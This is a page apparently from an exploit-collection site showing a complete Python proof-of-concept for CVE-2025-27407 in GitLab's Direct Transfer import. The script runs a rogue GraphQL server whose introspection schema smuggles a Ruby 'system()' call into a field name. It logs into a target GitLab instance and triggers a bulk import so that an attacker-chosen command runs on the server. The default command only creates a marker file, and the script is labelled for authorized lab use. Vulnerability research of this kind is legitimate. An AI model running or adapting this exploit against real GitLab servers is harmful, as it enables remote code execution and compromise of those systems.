5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_host_port_cmd.py PY
#!/usr/bin/env python3
import argparse
import html
import http.cookiejar
import json
import re
import shlex
import threading
import time
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


DEFAULT_CMD = "touch /tmp/cve_2025_27407_gitlab_marker"


def log(message):
    print(message, flush=True)


def scalar_field(name, scalar):
    return {
        "name": name,
        "description": None,
        "args": [],
        "type": {"kind": "SCALAR", "name": scalar, "ofType": None},
        "isDeprecated": False,
        "deprecationReason": None,
    }


def malicious_schema(command):
    payload_name = f"safe\nend\nsystem({command!r})\ndef safe2"

    return {
        "data": {
            "__schema": {
                "queryType": {"name": "Query"},
                "mutationType": None,
                "subscriptionType": None,
                "types": [
                    {
                        "kind": "OBJECT",
                        "name": "Query",
                        "description": None,
                        "fields": [
                            {
                                "name": "group",
                                "description": None,
                                "args": [
                                    {
                                        "name": "fullPath",
                                        "description": None,
                                        "type": {"kind": "SCALAR", "name": "ID", "ofType": None},
                                        "defaultValue": None,
                                    }
                                ],
                                "type": {"kind": "OBJECT", "name": "Group", "ofType": None},
                                "isDeprecated": False,
                                "deprecationReason": None,
                            }
                        ],
                        "interfaces": [],
                    },
                    {
                        "kind": "OBJECT",
                        "name": "Group",
                        "description": None,
                        "fields": [
                            scalar_field("id", "ID"),
                            scalar_field("name", "String"),
                            scalar_field("path", "String"),
                            scalar_field("description", "String"),
                            scalar_field("visibility", "String"),
                            scalar_field("emailsDisabled", "Boolean"),
                            scalar_field("lfsEnabled", "Boolean"),
                            scalar_field("mentionsDisabled", "Boolean"),
                            scalar_field("projectCreationLevel", "String"),
                            scalar_field("requestAccessEnabled", "Boolean"),
                            scalar_field("requireTwoFactorAuthentication", "Boolean"),
                            scalar_field("shareWithGroupLock", "Boolean"),
                            scalar_field("subgroupCreationLevel", "String"),
                            scalar_field("twoFactorGracePeriod", "Int"),
                        ],
                        "interfaces": [],
                    },
                    {
                        "kind": "INPUT_OBJECT",
                        "name": "ExploitInput",
                        "description": None,
                        "inputFields": [
                            {
                                "name": payload_name,
                                "description": None,
                                "type": {"kind": "SCALAR", "name": "String", "ofType": None},
                                "defaultValue": None,
                            }
                        ],
                    },
                ],
                "directives": [],
            }
        }
    }


class EvilSourceHandler(BaseHTTPRequestHandler):
    payload_command = DEFAULT_CMD
    events = []
    saw_introspection = threading.Event()

    def send_json(self, status, body):
        data = json.dumps(body).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def event(self, message):
        EvilSourceHandler.events.append(message)
        log(f"[evil-source] {message}")

    def do_GET(self):
        path = self.path.split("?", 1)[0]
        if path in ("/api/v4/version", "/api/v4/metadata"):
            self.event(f"GET {path}")
            self.send_json(200, {"version": "16.11.8", "revision": "cve-2025-27407-lab", "enterprise": False})
        elif path == "/api/v4/personal_access_tokens/self":
            self.event(f"GET {path}")
            self.send_json(200, {"id": 1, "name": "lab-token", "scopes": ["api"], "active": True})
        elif path.endswith("/export_relations/status"):
            self.event(f"GET {path}")
            self.send_json(200, {"relations": []})
        else:
            self.event(f"GET {path} -> 404")
            self.send_json(404, {"message": "not found"})

    def do_POST(self):
        path = self.path.split("?", 1)[0]
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode(errors="replace")
        if path == "/api/graphql":
            if "__schema" in body or "IntrospectionQuery" in body:
                EvilSourceHandler.saw_introspection.set()
                self.event(f"POST /api/graphql introspection -> malicious schema; command={self.payload_command!r}")
                self.send_json(200, malicious_schema(self.payload_command))
            else:
                self.event("POST /api/graphql normal query")
                self.send_json(
                    200,
                    {
                        "data": {
                            "group": {
                                "id": "gid://gitlab/Group/1",
                                "name": "evilgroup",
                                "path": "evilgroup",
                                "description": "lab group",
                                "visibility": "private",
                                "emailsDisabled": False,
                                "lfsEnabled": True,
                                "mentionsDisabled": False,
                                "projectCreationLevel": "developer",
                                "requestAccessEnabled": False,
                                "requireTwoFactorAuthentication": False,
                                "shareWithGroupLock": False,
                                "subgroupCreationLevel": "owner",
                                "twoFactorGracePeriod": 48,
                            }
                        }
                    },
                )
        elif path.endswith("/export_relations"):
            self.event(f"POST {path} -> 404")
            self.send_json(404, {"message": "export intentionally not implemented"})
        else:
            self.event(f"POST {path} -> 404")
            self.send_json(404, {"message": "not found"})

    def log_message(self, _format, *_args):
        return


def start_evil_source(listen_host, listen_port, command):
    EvilSourceHandler.payload_command = command
    EvilSourceHandler.events = []
    EvilSourceHandler.saw_introspection.clear()
    server = ThreadingHTTPServer((listen_host, listen_port), EvilSourceHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    log(f"[*] evil source listening on {listen_host}:{listen_port}")
    return server


def wait_for_introspection(timeout_seconds):
    log(f"[*] keeping evil source alive for up to {timeout_seconds}s while GitLab workers run")
    deadline = time.time() + timeout_seconds
    while time.time() < deadline:
        if EvilSourceHandler.saw_introspection.wait(timeout=1):
            log("[+] GitLab reached /api/graphql introspection over HTTP")
            return True
    log("[-] timed out waiting for /api/graphql introspection")
    return False


class GitLabSession:
    def __init__(self, base_url):
        self.base_url = base_url.rstrip("/")
        jar = http.cookiejar.CookieJar()
        self.http = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    def request(self, method, path, data=None, headers=None, json_body=False, allow_http_error=False):
        url = path if path.startswith("http") else self.base_url + path
        request_headers = {"User-Agent": "cve-2025-27407-host-port-cmd-poc"}
        if headers:
            request_headers.update(headers)
        body = None
        if data is not None:
            if json_body:
                body = json.dumps(data).encode()
                request_headers["Content-Type"] = "application/json"
            else:
                body = urllib.parse.urlencode(data, doseq=True).encode()
                request_headers["Content-Type"] = "application/x-www-form-urlencoded"
        request = urllib.request.Request(url, data=body, method=method, headers=request_headers)
        try:
            response = self.http.open(request, timeout=90)
            return response.status, response.geturl(), response.headers, response.read().decode(errors="replace")
        except urllib.error.HTTPError as exc:
            if not allow_http_error:
                raise
            return exc.code, exc.geturl(), exc.headers, exc.read().decode(errors="replace")


def csrf_from(body):
    patterns = [
        r'name="csrf-token"\s+content="([^"]+)"',
        r'content="([^"]+)"\s+name="csrf-token"',
        r'name="authenticity_token"\s+value="([^"]+)"',
    ]
    for pattern in patterns:
        match = re.search(pattern, body)
        if match:
            return html.unescape(match.group(1))
    raise RuntimeError("could not find CSRF token")


def trigger_import(gitlab, source_url, username, password):
    status, _, _, body = gitlab.request("GET", "/users/sign_in")
    log(f"[*] sign-in page status={status}")
    csrf = csrf_from(body)

    status, url, _, body = gitlab.request(
        "POST",
        "/users/sign_in",
        {
            "authenticity_token": csrf,
            "user[login]": username,
            "user[password]": password,
            "user[remember_me]": "0",
        },
        {"Referer": f"{gitlab.base_url}/users/sign_in"},
        allow_http_error=True,
    )
    log(f"[*] login status={status} final_url={url}")
    if "users/sign_in" in url and status != 200:
        raise RuntimeError("login failed")

    csrf = csrf_from(body)
    status, url, _, body = gitlab.request(
        "POST",
        "/import/bulk_imports/configure",
        {
            "authenticity_token": csrf,
            "bulk_import_gitlab_url": source_url,
            "bulk_import_gitlab_access_token": "fake-api-token-with-api-scope",
        },
        {"Referer": f"{gitlab.base_url}/import/bulk_imports/status"},
        allow_http_error=True,
    )
    log(f"[*] configure status={status} final_url={url}")
    if status >= 400:
        raise RuntimeError(f"configure failed: {body[:500]}")

    status, _, _, body = gitlab.request("GET", "/")
    csrf = csrf_from(body)
    destination_name = f"evilgroup-copy-{int(time.time())}"
    status, url, _, body = gitlab.request(
        "POST",
        "/import/bulk_imports",
        {
            "bulk_import": [
                {
                    "source_type": "group_entity",
                    "source_full_path": "evilgroup",
                    "destination_name": destination_name,
                    "destination_namespace": "",
                    "migrate_projects": False,
                    "migrate_memberships": False,
                }
            ]
        },
        {
            "Referer": f"{gitlab.base_url}/import/bulk_imports/status",
            "X-CSRF-Token": csrf,
            "Accept": "application/json",
        },
        json_body=True,
        allow_http_error=True,
    )
    log(f"[*] create/import trigger status={status} final_url={url}")
    log(body[:2000])
    return status


def main():
    parser = argparse.ArgumentParser(description="CVE-2025-27407 GitLab Direct Transfer PoC for local authorized lab use")
    parser.add_argument("--host", required=True, help="GitLab host, e.g. 127.0.0.1")
    parser.add_argument("--port", type=int, required=True, help="GitLab HTTP port, e.g. 18080")
    parser.add_argument("--cmd", default=DEFAULT_CMD, help=f"Command to run in GitLab runtime, default: {DEFAULT_CMD!r}")
    parser.add_argument("--scheme", default="http", choices=("http", "https"), help="GitLab scheme")
    parser.add_argument("--username", default="root", help="GitLab username")
    parser.add_argument("--password", default="Cve27407Password!", help="GitLab password")
    parser.add_argument("--listen-host", default="0.0.0.0", help="Evil source bind host")
    parser.add_argument("--listen-port", type=int, default=8001, help="Evil source bind port")
    parser.add_argument("--wait-seconds", type=int, default=90, help="How long to keep the evil source alive after triggering import")
    parser.add_argument(
        "--source-url",
        default=None,
        help="URL GitLab should use to reach evil source; default uses host.containers.internal with --listen-port",
    )
    args = parser.parse_args()

    source_url = args.source_url or f"http://host.containers.internal:{args.listen_port}"
    gitlab_url = f"{args.scheme}://{args.host}:{args.port}"

    log(f"[*] target GitLab: {gitlab_url}")
    log(f"[*] source URL as seen by GitLab: {source_url}")
    log(f"[*] test command: {args.cmd!r}")
    log(f"[*] shell-safe display: {shlex.join(['sh', '-lc', args.cmd])}")

    server = start_evil_source(args.listen_host, args.listen_port, args.cmd)
    try:
        trigger_import(GitLabSession(gitlab_url), source_url, args.username, args.password)
        wait_for_introspection(args.wait_seconds)
        log("[*] trigger sent; verify the command side effect on the GitLab runtime")
        if EvilSourceHandler.events:
            log("[*] evil source observed requests:")
            for event in EvilSourceHandler.events[-20:]:
                log(f"    {event}")
    finally:
        server.shutdown()


if __name__ == "__main__":
    main()